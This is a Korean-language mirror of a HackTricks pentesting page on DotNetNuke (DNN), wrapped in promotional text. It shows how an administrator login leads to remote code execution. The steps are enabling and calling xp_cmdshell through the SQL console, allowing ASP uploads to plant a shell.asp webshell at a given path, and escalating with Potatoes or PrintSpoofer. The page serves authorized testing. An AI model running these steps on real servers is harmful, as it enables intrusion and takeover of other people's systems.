mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
3.8 KiB
3.8 KiB
DotNetNuke (DNN)
htARTE (HackTricks AWS Red Team Expert)을 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
- 사이버 보안 회사에서 일하시나요? 회사를 HackTricks에서 광고하거나 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? SUBSCRIPTION PLANS를 확인해보세요!
- The PEASS Family를 발견해보세요. 독점적인 NFT 컬렉션입니다.
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter에서 저를 팔로우하세요 🐦@carlospolopm.
- **hacktricks repo와 hacktricks-cloud repo**에 PR을 제출하여 여러분의 해킹 기법을 공유하세요.
DotNetNuke (DNN)
DNN에 관리자로 로그인하면 RCE를 쉽게 얻을 수 있습니다.
RCE
SQL을 통한 RCE
Settings
페이지에서 접근 가능한 SQL 콘솔을 사용하여 **xp_cmdshell
**을 활성화하고 운영 체제 명령을 실행할 수 있습니다.
다음 라인을 사용하여 **xp_cmdshell
**을 활성화하세요:
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
그리고 **"스크립트 실행"**을 눌러 SQL 문을 실행합니다.
그런 다음 다음과 같은 방법을 사용하여 OS 명령을 실행합니다:
xp_cmdshell 'whoami'
ASP 웹쉘을 통한 접근
설정 -> 보안 -> 추가 -> 추가 보안 설정
에서 허용 파일 확장자
아래에 새로운 허용 확장자를 추가할 수 있으며, 그 후 저장
버튼을 클릭합니다.
asp
또는 **aspx
**를 추가하고, **/admin/file-management
**에 shell.asp
라는 이름의 ASP 웹쉘을 업로드합니다.
그런 다음 **/Portals/0/shell.asp
**에 접속하여 웹쉘에 액세스합니다.
권한 상승
예를 들어 Potatoes 또는 PrintSpoofer를 사용하여 권한을 상승할 수 있습니다.
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
- 사이버 보안 회사에서 일하시나요? 회사를 HackTricks에서 홍보하거나 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? SUBSCRIPTION PLANS를 확인해보세요!
- The PEASS Family를 발견해보세요. 독점적인 NFTs 컬렉션입니다.
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter에서 저를 팔로우하세요 🐦@carlospolopm.
- **hacktricks repo와 hacktricks-cloud repo**에 PR을 제출하여 여러분의 해킹 기법을 공유해주세요.